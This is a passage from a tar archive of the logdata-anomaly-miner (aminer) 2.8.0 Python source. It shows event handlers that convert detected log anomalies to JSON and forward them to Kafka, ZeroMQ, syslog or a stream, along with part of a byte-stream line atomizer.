hasattr(self, "log_atom"): if self.log_atom.get_timestamp() is not None: message += f"{datetime.fromtimestamp(self.log_atom.get_timestamp()).strftime('%Y-%m-%d %H:%M:%S')} " message += f"{self.event_message}\n" message += f"{self.event_source.__class__.__name__}: {self.description} ({len(self.sorted_log_lines)} lines)\n" else: message += f"{self.event_message} ({len(self.sorted_log_lines)} lines)\n" else: indent = "" for line in self.sorted_log_lines: if isinstance(line, bytes): if line != b"": message += indent + line.decode(AminerConfig.ENCODING) + "\n" else: original_log_line_prefix = self.analysis_context.aminer_config.config_properties.get(CONFIG_KEY_LOG_LINE_PREFIX) if original_log_line_prefix is not None and line.startswith(original_log_line_prefix): message += line + "\n" elif line != "": message += indent + line + "\n" if self.event_message is None: # remove last newline message = message[:-1] return message EventInterfaces.py000066400000000000000000000064771500476301700341050ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/events"""This file contains interface definition useful implemented by classes in this directory and for use from code outside this directory. All classes are defined in separate files, only the namespace references are added here to simplify the code. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import abc class EventHandlerInterface(metaclass=abc.ABCMeta): """This is the common interface of all components that can be notified on significant log data mining events. To avoid interference with the analysis process, the listener may only perform fast actions within the call. Longer running tasks have to be performed asynchronously. """ @abc.abstractmethod def receive_event(self, event_type, event_message, sorted_loglines, event_data, log_atom, event_source): """ Receive information about a detected event. @param event_type is a string with the event type class this event belongs to. This information can be used to interpret type-specific event_data objects. Together with the eventMessage and sorted_loglines, this can be used to create generic log messages. @param event_message the first output line of the event. @param sorted_loglines sorted list of log lines that were considered when generating the event, as far as available to the time of the event. The list has to contain at least one line. @param event_data type-specific event data object, should not be used unless listener really knows about the event_type. @param log_atom the log atom which produced the event. @param event_source reference to detector generating the event. """ class EventSourceInterface(metaclass=abc.ABCMeta): """This is the common interface of all event sources. Component not implementing this interface may still emit events without support for callbacks. """ @abc.abstractmethod def allowlist_event(self, event_type, event_data, allowlisting_data): """Allowlist an event generated by this source using the information emitted when generating the event. @return a message with information about allowlisting @throws NotImplementedError if this source does not support allowlisting per se @throws Exception when allowlisting of this special event using given allowlisting_data was not possible. """ @staticmethod def get_weight_analysis_field_path(): """Return the path to the list in the output of the detector which is weighted by the ScoringEventHandler.""" return [] @staticmethod def get_weight_output_field_path(): """Return the path where the ScoringEventHandler adds the scorings in the output of the detector.""" return [] JsonConverterHandler.py000066400000000000000000000204131500476301700351010ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/events"""This module defines an event handler that converts an event to JSON. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import json import time import copy import logging from aminer.events.EventInterfaces import EventHandlerInterface from aminer.AminerConfig import DEBUG_LOG_NAME, ENCODING, KEY_LOG_LINE_IDENTIFIER, KEY_AMINER_ID class JsonConverterHandler(EventHandlerInterface): """This class implements an event record listener, that will convert event data to JSON format.""" def __init__(self, json_event_handlers, analysis_context, pretty_print=True): """Initialize the event handler. @param json_event_handlers the event handlers to which the json converted data is sent. @param analysis_context the analysis context used to get the component. @param pretty_print if true, the json is printed pretty; otherwise the json is printed with less space needed. """ if not isinstance(json_event_handlers, list) or any(not isinstance(x, EventHandlerInterface) for x in json_event_handlers): msg = "json_event_handlers must be a list of event handlers implementing the EventHandlerInterface." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if not json_event_handlers: msg = "json_event_handlers must not be empty." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if not isinstance(json_event_handlers, list) or any(not isinstance(x, EventHandlerInterface) for x in json_event_handlers): msg = "json_event_handlers must be a list of event handlers implementing the EventHandlerInterface." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) self.json_event_handlers = json_event_handlers self.analysis_context = analysis_context if not isinstance(pretty_print, bool): msg = "pretty_print must be a boolean value." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) self.pretty_print = pretty_print def receive_event(self, event_type, event_message, sorted_loglines, event_data, log_atom, event_source): """ Receive information about a detected event. @param event_type is a string with the event type class this event belongs to. This information can be used to interpret type-specific event_data objects. Together with the eventMessage and sorted_loglines, this can be used to create generic log messages. @param event_message the first output line of the event. @param sorted_loglines sorted list of log lines that were considered when generating the event, as far as available to the time of the event. The list has to contain at least one line. @param event_data type-specific event data object, should not be used unless listener really knows about the event_type. @param log_atom the log atom which produced the event. @param event_source reference to detector generating the event. """ if hasattr(event_source, "output_event_handlers") and event_source.output_event_handlers is not None and self not in \ event_source.output_event_handlers: return True component_name = self.analysis_context.get_name_by_component(event_source) if component_name in self.analysis_context.suppress_detector_list: return True if "StatusInfo" in event_data: # No anomaly; do nothing on purpose pass else: log_data = {} try: data = log_atom.raw_data.decode(ENCODING) except UnicodeError: data = repr(log_atom.raw_data) log_data["RawLogData"] = [data] if log_atom.get_timestamp() is None: log_atom.set_timestamp(time.time()) log_data["Timestamps"] = [round(log_atom.atom_time, 2)] log_data["DetectionTimestamp"] = round(time.time(), 2) log_data["LogLinesCount"] = len(sorted_loglines) if log_atom.parser_match is not None and hasattr(event_source, "output_logline") and event_source.output_logline: log_data["AnnotatedMatchElement"] = {} for path, match in log_atom.parser_match.get_match_dictionary().items(): if isinstance(match, list): for match_element_id, match_element in enumerate(match): if isinstance(match_element.match_object, bytes): log_data["AnnotatedMatchElement"][path + "/" + str(match_element_id)] = match_element.match_object.decode( ENCODING) else: log_data["AnnotatedMatchElement"][path + "/" + str(match_element_id)] = str(match_element.match_object) elif isinstance(match.match_object, bytes): log_data["AnnotatedMatchElement"][path] = match.match_object.decode(ENCODING) else: log_data["AnnotatedMatchElement"][path] = str(match.match_object) analysis_component = {"AnalysisComponentIdentifier": self.analysis_context.get_id_by_component(event_source)} if event_source.__class__.__name__ == "ExtractedData_class": analysis_component["AnalysisComponentType"] = "DistributionDetector" else: analysis_component["AnalysisComponentType"] = str(event_source.__class__.__name__) analysis_component["AnalysisComponentName"] = self.analysis_context.get_name_by_component(event_source) analysis_component["Message"] = event_message if hasattr(event_source, "persistence_id"): analysis_component["PersistenceFileName"] = event_source.persistence_id if hasattr(event_source, "learn_mode"): analysis_component["TrainingMode"] = event_source.learn_mode detector_analysis_component = event_data.get("AnalysisComponent") if detector_analysis_component is not None: for key in detector_analysis_component: if key in analysis_component: continue analysis_component[key] = detector_analysis_component.get(key) log_resource = log_atom.source.resource_name if log_resource is not None: analysis_component["LogResource"] = log_resource.decode() if "LogData" not in event_data: if self.analysis_context.aminer_config.config_properties.get(KEY_LOG_LINE_IDENTIFIER): event_data["LogLineIdentifier"] = log_atom.log_line_identifier event_data["LogData"] = log_data event_data["AnalysisComponent"] = analysis_component aminer_id = self.analysis_context.aminer_config.config_properties.get(KEY_AMINER_ID) if aminer_id is not None: event_data["AminerId"] = aminer_id if self.pretty_print is True: json_data = json.dumps(event_data, indent=2) else: json_data = json.dumps(event_data) res = [""] * len(sorted_loglines) res[0] = str(json_data) for listener in self.json_event_handlers: if hasattr(event_source, "output_event_handlers") and event_source.output_event_handlers is not None \ and listener not in event_source.output_event_handlers: event_source = copy.copy(event_source) event_source.output_event_handlers.append(listener) listener.receive_event(event_type, None, res, json_data, log_atom, event_source) return True KafkaEventHandler.py000066400000000000000000000112021500476301700343130ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/events"""This module defines an event handler that forwards Json-objects to Kafka. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import sys import logging from aminer.AminerConfig import DEBUG_LOG_NAME from aminer.events.EventInterfaces import EventHandlerInterface class KafkaEventHandler(EventHandlerInterface): """This class implements an event record listener, that will forward Json- objects to a Kafka queue.""" def __init__(self, analysis_context, topic, options): """Initialize the event handler. @param analysis_context the analysis context used to get the component. @param topic the Kafka topic to which the data is sent. @param options Kafka specific options. """ self.analysis_context = analysis_context self.options = options if not isinstance(options, dict) or any(not isinstance(x, str) for x in options.keys()): msg = "options has to be a dictionary with string keys." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if not isinstance(topic, str): msg = "topic has to be of the type string." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if topic is not None and len(topic) == 0: msg = "topic must not be empty." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) self.topic = topic self.producer = None self.kafka_imported = False def receive_event(self, _event_type, _event_message, _sorted_loglines, event_data, _log_atom, event_source): """ Receive information about a detected event in json format. @param _event_type is a string with the event type class this event belongs to. This information can be used to interpret type-specific event_data objects. Together with the eventMessage and sorted_loglines, this can be used to create generic log messages. @param _event_message the first output line of the event. @param _sorted_loglines sorted list of log lines that were considered when generating the event, as far as available to the time of the event. The list has to contain at least one line. @param event_data type-specific event data object, should not be used unless listener really knows about the event_type. @param _log_atom the log atom which produced the event. @param event_source reference to detector generating the event. """ if hasattr(event_source, "output_event_handlers") and event_source.output_event_handlers is not None and self not in \ event_source.output_event_handlers: return True component_name = self.analysis_context.get_name_by_component(event_source) if component_name in self.analysis_context.suppress_detector_list: return True if self.kafka_imported is False: try: from kafka import KafkaProducer from kafka.errors import KafkaError self.producer = KafkaProducer(**self.options, value_serializer=lambda v: v.encode()) self.kafka_imported = True except ImportError: msg = "Kafka module not found." logging.getLogger(DEBUG_LOG_NAME).error(msg) print("ERROR: " + msg, file=sys.stderr) return False if not isinstance(event_data, str) and not isinstance(event_data, bytes): msg = "KafkaEventHandler received non-string event data. Use the JsonConverterHandler to serialize it first." logging.getLogger(DEBUG_LOG_NAME).warning(msg) print("WARNING: " + msg, file=sys.stderr) return False try: self.producer.send(self.topic, event_data) except KafkaError as err: msg = str(err) logging.getLogger(DEBUG_LOG_NAME).error(msg) print("Error: " + msg, file=sys.stderr) self.producer.close() self.producer = None return False return True ScoringEventHandler.py000066400000000000000000000164031500476301700347120ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/events"""This module defines an event handler that adds a confidence score to the anomaly output. The score is calculated through analysis of a list of strings defined in the detector through the function get_weight_analysis_field_path and weights the single strings based on the weights dictionary. The weights can optionally be automatically calculated. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import copy import logging from aminer.events.EventInterfaces import EventHandlerInterface from aminer.events.EventInterfaces import EventSourceInterface from aminer.AminerConfig import DEBUG_LOG_NAME from aminer.AnalysisChild import AnalysisContext class ScoringEventHandler(EventHandlerInterface): """This class implements an event record listener, that will add a confidence score to the anomaly output.""" def __init__(self, event_handlers, analysis_context, weights=None, auto_weights=False, auto_weights_history_length=1000): """ Initialize the ScoringEventHandler component. @param weights A dictionary that specifies the weights of values for the scoring. The keys are the strings of the analyzed list and the corresponding values are the assigned weights. Strings that are not present in this dictionary have the weight 0.5 if not automatically weighted. @param auto_weights boolean value that states if the weights should be automatically calculated through the formula 10 / (10 + number of value appearances). @param auto_weights_history_length integer value that specifies the number of values that are considered in the calculation of the weights. """ if not event_handlers: msg = "event_handlers must not be empty or None." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if not isinstance(event_handlers, list) or any(not isinstance(x, EventHandlerInterface) for x in event_handlers): msg = "event_handlers must be a list of EventHandlerInterface." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if not isinstance(analysis_context, AnalysisContext): msg = "analysis_child must be of type AnalysisChild." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if weights is not None and (not isinstance(weights, dict) or any(not isinstance(x, (int, float)) for x in list(weights.values()))): msg = "weights must be a dictionary with numerical values." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if not isinstance(auto_weights, bool): msg = "auto_weights must be of type boolean." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if isinstance(auto_weights_history_length, bool) or not isinstance(auto_weights_history_length, int): msg = "auto_weights must be of type boolean." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if auto_weights_history_length < 1: msg = "auto_weights must be greater than zero." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) self.analysis_context = analysis_context self.event_handlers = event_handlers self.weights = weights self.auto_weights = auto_weights self.auto_weights_history_length = auto_weights_history_length if self.auto_weights: self.history_list = [[] for _ in range(self.auto_weights_history_length)] self.history_list_index = 0 def receive_event(self, event_type, event_message, sorted_log_lines, event_data, log_atom, event_source): """Receive information about a detected event.""" path_valid = True if isinstance(event_source, EventSourceInterface): analysis_field_path = event_source.get_weight_analysis_field_path() output_field_path = event_source.get_weight_output_field_path() else: analysis_field_path = [] output_field_path = [] if not analysis_field_path: path_valid = False else: analysis_list = event_data for path in analysis_field_path: if path in analysis_list: analysis_list = analysis_list[path] else: path_valid = False break # Calculate and add the confidence to the output if the path is valid if path_valid: event_data_confidence = event_data for path in output_field_path[:-1]: if path not in event_data_confidence: event_data_confidence[path] = {} event_data_confidence = event_data_confidence[path] # Calculate the absolute confidence confidence_absolut = sum(self.get_weight(val) for val in analysis_list) # Add the absolute and mean confidence to the message event_data_confidence[output_field_path[-1]] = {'confidence_absolut': confidence_absolut, 'confidence_mean': confidence_absolut / len(analysis_list)} # Update the history list and increase the count index if self.auto_weights: self.history_list[self.history_list_index] = analysis_list self.history_list_index += 1 if self.history_list_index >= self.auto_weights_history_length: self.history_list_index %= self.auto_weights_history_length # Send the message to the following event handlers for listener in self.event_handlers: if hasattr(event_source, "output_event_handlers") and event_source.output_event_handlers is not None \ and listener not in event_source.output_event_handlers: event_source = copy.copy(event_source) event_source.output_event_handlers.append(listener) listener.receive_event(event_type, event_message, sorted_log_lines, event_data, log_atom, event_source) def get_weight(self, value): """Return the weight of the value parameter.""" if self.weights is not None and value in self.weights: # Return the specified weight if the value is in the weight list return self.weights[value] if not self.auto_weights: # Return 0.5 if the value is not in the weight list and the weights are not automatically calculated return 0.5 # Else calculate the weight through 10 / (10 + number of value appearances) return 10 / (10 + sum(value in value_list for value_list in self.history_list)) StreamPrinterEventHandler.py000066400000000000000000000065421500476301700361100ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/events"""This module defines an event handler that prints data to a stream. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import sys import io import logging from aminer.AminerConfig import DEBUG_LOG_NAME from aminer.events.EventInterfaces import EventHandlerInterface from aminer.events.EventData import EventData class StreamPrinterEventHandler(EventHandlerInterface): """This class implements an event record listener, that will just print out data about the event to a stream. By default this is stdout. """ def __init__(self, analysis_context, stream=sys.stdout): """Initialize the event handler. @param analysis_context the analysis context used to get the component. @param stream the output stream of the event handler. """ self.analysis_context = analysis_context if not isinstance(stream, io.IOBase): msg = "The stream variable has to be a stream." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) self.stream = stream def receive_event(self, event_type, event_message, sorted_loglines, event_data, log_atom, event_source): """ Receive information about a detected event. @param event_type is a string with the event type class this event belongs to. This information can be used to interpret type-specific event_data objects. Together with the eventMessage and sorted_loglines, this can be used to create generic log messages. @param event_message the first output line of the event. @param sorted_loglines sorted list of log lines that were considered when generating the event, as far as available to the time of the event. The list has to contain at least one line. @param event_data type-specific event data object, should not be used unless listener really knows about the event_type. @param log_atom the log atom which produced the event. @param event_source reference to detector generating the event. """ if hasattr(event_source, "output_event_handlers") and event_source.output_event_handlers is not None and self not in \ event_source.output_event_handlers: return True component_name = self.analysis_context.get_name_by_component(event_source) if component_name in self.analysis_context.suppress_detector_list: return True event_data_obj = EventData(event_type, event_message, sorted_loglines, event_data, log_atom, event_source, self.analysis_context) message = f"{event_data_obj.receive_event_string()}\n" if hasattr(self.stream, "buffer"): self.stream.buffer.write(message.encode()) else: self.stream.write(message) self.stream.flush() return True SyslogWriterEventHandler.py000066400000000000000000000115371500476301700357660ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/events"""This module defines an event handler that prints data to a local syslog instance. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import io import os import syslog import logging from aminer.AminerConfig import DEBUG_LOG_NAME from aminer.events.EventInterfaces import EventHandlerInterface from aminer.events.StreamPrinterEventHandler import StreamPrinterEventHandler class SyslogWriterEventHandler(EventHandlerInterface): """This class implements an event record listener to forward events to the local syslog instance. CAVEAT: USE THIS AT YOUR OWN RISK: by creating aminer/syslog log data processing loops, you will flood your syslog and probably fill up your disks. """ def __init__(self, analysis_context, instance_name="aminer"): """Initialize the event handler. @param analysis_context the analysis context used to get the component. @param instance_name the process name shown in the syslog. """ self.analysis_context = analysis_context if not isinstance(instance_name, str): msg = "instance_name has to be of the type string." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if instance_name is not None and len(instance_name) == 0: msg = "instance_name must not be empty." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) self.instanceName = instance_name syslog.openlog(f"{self.instanceName}[{os.getpid()}]", syslog.LOG_INFO, syslog.LOG_DAEMON) syslog.syslog(syslog.LOG_INFO, "Syslog logger initialized") self.buffer_stream = io.StringIO() self.event_writer = StreamPrinterEventHandler(analysis_context, self.buffer_stream) self.event_id = 0 def receive_event(self, event_type, event_message, sorted_loglines, event_data, log_atom, event_source): """ Receive information about a detected even and forward it to syslog. @param event_type is a string with the event type class this event belongs to. This information can be used to interpret type-specific event_data objects. Together with the eventMessage and sorted_loglines, this can be used to create generic log messages. @param event_message the first output line of the event. @param sorted_loglines sorted list of log lines that were considered when generating the event, as far as available to the time of the event. The list has to contain at least one line. @param event_data type-specific event data object, should not be used unless listener really knows about the event_type. @param log_atom the log atom which produced the event. @param event_source reference to detector generating the event. """ if hasattr(event_source, "output_event_handlers") and event_source.output_event_handlers is not None and self not in \ event_source.output_event_handlers: return True elif hasattr(event_source, "output_event_handlers") and event_source.output_event_handlers is not None and self in \ event_source.output_event_handlers and self.event_writer not in event_source.output_event_handlers: event_source.output_event_handlers.append(self.event_writer) component_name = self.analysis_context.get_name_by_component(event_source) if component_name in self.analysis_context.suppress_detector_list: return True self.buffer_stream.seek(0) self.buffer_stream.truncate(0) self.event_writer.receive_event(event_type, event_message, sorted_loglines, event_data, log_atom, event_source) event_data = self.buffer_stream.getvalue() current_event_id = self.event_id self.event_id += 1 serial = 0 for data_line in event_data.strip().split('\n'): # Python syslog is very ugly if lines are too long, so break them down. while data_line: if serial == 0: message = f"[{current_event_id}] {data_line[:800]}" else: message = f"[{current_event_id}-{serial}] {data_line[:800]}" data_line = data_line[800:] syslog.syslog(syslog.LOG_INFO, message) serial += 1 return True logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/events/Utils.py000066400000000000000000000050341500476301700321630ustar00rootroot00000000000000"""This module defines a handler for storing event history. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ from aminer.events.EventInterfaces import EventHandlerInterface from aminer.util.History import LogarithmicBackoffHistory class VolatileLogarithmicBackoffEventHistory(EventHandlerInterface, LogarithmicBackoffHistory): """This class is a volatile filter to keep a history of received events. Example usages are for analysis by other components or for external access via remote control interface. """ def __init__(self, max_items): """Initialize the history component. @param max_items the maximum number of items in the event history. """ LogarithmicBackoffHistory.__init__(self, max_items) self.event_id = 0 def receive_event(self, event_type, event_message, sorted_loglines, event_data, log_atom, event_source): """ Receive information about a detected event and store all related data as tuple to the history log. @param event_type is a string with the event type class this event belongs to. This information can be used to interpret type-specific event_data objects. Together with the eventMessage and sorted_loglines, this can be used to create generic log messages. @param event_message the first output line of the event. @param sorted_loglines sorted list of log lines that were considered when generating the event, as far as available to the time of the event. The list has to contain at least one line. @param event_data type-specific event data object, should not be used unless listener really knows about the event_type. @param log_atom the log atom which produced the event. @param event_source reference to detector generating the event. """ self.add_object((self.event_id, event_type, event_message, sorted_loglines, event_data, log_atom, event_source)) self.event_id += 1 return True ZmqEventHandler.py000066400000000000000000000116521500476301700340560ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/events"""This module defines an event handler that forwards anomalies to ZeroMQ. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import sys import logging import zmq import time from aminer.AminerConfig import DEBUG_LOG_NAME from aminer.events.EventInterfaces import EventHandlerInterface class ZmqEventHandler(EventHandlerInterface): """This class implements an event record listener, that will forward Json- objects to a ZeroMQ queue.""" def __init__(self, analysis_context, topic=None, url="ipc:///tmp/aminer"): """Initialize the event handler. @param analysis_context the analysis context used to get the component. @param topic the topic used in the Zero Message Queue. @param url the internal inter process communication channel. """ if not isinstance(url, (str, bytes)): msg = "url has to be of the type string or bytes." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if url is not None and len(url) == 0: msg = "url must not be empty." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if not isinstance(topic, str): msg = "topic has to be of the type string." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if topic is not None and len(topic) == 0: msg = "topic must not be empty." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) self.analysis_context = analysis_context self.url = url self.topic = topic self.context = zmq.Context() self.producer = self.context.socket(zmq.PUB) self.producer.bind(self.url) time.sleep(1) logging.getLogger(DEBUG_LOG_NAME).info("ZmqEventHandler initialized") def receive_event(self, _event_type, _event_message, _sorted_loglines, event_data, _log_atom, event_source): """Receive information about a detected event in json format. Receive information about a detected event in json format. @param _event_type is a string with the event type class this event belongs to. This information can be used to interpret type-specific event_data objects. Together with the eventMessage and sorted_loglines, this can be used to create generic log messages. @param _event_message the first output line of the event. @param _sorted_loglines sorted list of log lines that were considered when generating the event, as far as available to the time of the event. The list has to contain at least one line. @param event_data type-specific event data object, should not be used unless listener really knows about the event_type. @param _log_atom the log atom which produced the event. @param event_source reference to detector generating the event. """ if hasattr(event_source, "output_event_handlers") and event_source.output_event_handlers is not None and self not in \ event_source.output_event_handlers: return True component_name = self.analysis_context.get_name_by_component(event_source) if component_name in self.analysis_context.suppress_detector_list: return True if not isinstance(event_data, str) and not isinstance(event_data, bytes): msg = "ZmqEventHandler received non-string event data. Use the JsonConverterHandler to serialize it first." logging.getLogger(DEBUG_LOG_NAME).warning(msg) print("WARNING: " + msg, file=sys.stderr) return False if isinstance(event_data, str): event_data += "\n" else: event_data += b"\n" try: if self.topic: self.producer.send_string(self.topic, flags=zmq.SNDMORE) # please note that if the JsonConvertHandler was used(json: true) # then it is possible to use the socket.recv_json() for the # consumer. recv_json() will decode the json-string self.producer.send_string(event_data) except zmq.ZMQError as err: msg = str(err) logging.getLogger(DEBUG_LOG_NAME).error(msg) print("Error: " + msg, file=sys.stderr) self.producer.close() self.producer = None return False return True logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/input/000077500000000000000000000000001500476301700303425ustar00rootroot00000000000000ByteStreamLineAtomizer.py000066400000000000000000000342621500476301700352460ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/input"""This module provides support for splitting a data stream into atoms, perform parsing and forward the results. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import logging import sys import time from aminer.AminerConfig import DEBUG_LOG_NAME from aminer.input.LogAtom import LogAtom from aminer.input.InputInterfaces import StreamAtomizer, AtomHandlerInterface from aminer.input.JsonStateMachine import json_machine from aminer.parsing.MatchContext import MatchContext from aminer.parsing.ParserMatch import ParserMatch from aminer.parsing.ModelElementInterface import ModelElementInterface from aminer.events.EventInterfaces import EventHandlerInterface breakout = False data = None line = None def found_json(_data): """Set the breakout variable if the JsonStateMachine finished.""" global breakout breakout = True global data data = _data class ByteStreamLineAtomizer(StreamAtomizer): """This atomizer consumes binary data from a stream to break it into lines, removing the line separator at the end. With a parsing model, it will also perform line parsing. Failures in atomizing or parsing will cause events to be generated and sent to event handler. Data will be consumed only when there was no downstream handler registered (the data will be discarded in that case) or when at least one downstream consumed the data. """ COUNTER = 0 def __init__(self, parsing_model, atom_handler_list, event_handler_list, max_line_length, default_timestamp_path_list, eol_sep=b"\n", json_format=False, xml_format=False, use_real_time=False, resource_name=None, continuous_timestamp_missing_warning=True): """ Create the atomizer. @param event_handler_list when not None, send events to those handlers. The list might be empty at invocation and populated later on. @param max_line_length the maximal line length including the final line separator. """ if not isinstance(parsing_model, ModelElementInterface): msg = "parsing_model must be of type ModelElementInterface!" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) self.parsing_model = parsing_model if atom_handler_list is not None and (not isinstance(atom_handler_list, list) or not all( isinstance(x, AtomHandlerInterface) for x in atom_handler_list)): msg = "atom_handler_list must be None or a list of AtomHandlerInterface!" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) self.atom_handler_list = atom_handler_list if not isinstance(event_handler_list, list) or not all(isinstance(x, EventHandlerInterface) for x in event_handler_list): msg = "event_handler_list must be a list of EventHandlerInterface!" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) self.event_handler_list = event_handler_list if isinstance(max_line_length, bool) or not isinstance(max_line_length, int): msg = "max_line_length must be of type integer!" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if max_line_length <= 0: msg = "max_line_length must be of type integer!" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) self.max_line_length = max_line_length if not isinstance(default_timestamp_path_list, list) or not all(isinstance(x, str) for x in default_timestamp_path_list): msg = "default_timestamp_path_list must be a list of strings!" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) self.default_timestamp_path_list = default_timestamp_path_list if not isinstance(eol_sep, bytes): msg = "eol_sep parameter must be of type bytes!" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if len(eol_sep) == 0: msg = "eol_sep parameter must not be empty!" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) self.eol_sep = eol_sep if not isinstance(json_format, bool): msg = "json_format parameter must be of type boolean!" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) self.json_format = json_format if not isinstance(xml_format, bool): msg = "xml_format parameter must be of type boolean!" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) self.xml_format = xml_format if json_format is True and xml_format is True: msg = "json_format and xml_format can not be true at the same time." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if not isinstance(use_real_time, bool): msg = "use_real_time parameter must be of type boolean!" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) self.use_real_time = use_real_time if resource_name is not None and not isinstance(resource_name, (bytes, str)): msg = "resource_name parameter must be of type string or bytes!" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) self.resource_name = resource_name self.printed_warning = False if not isinstance(continuous_timestamp_missing_warning, bool): msg = "continuous_timestamp_missing_warning parameter must be of type boolean!" 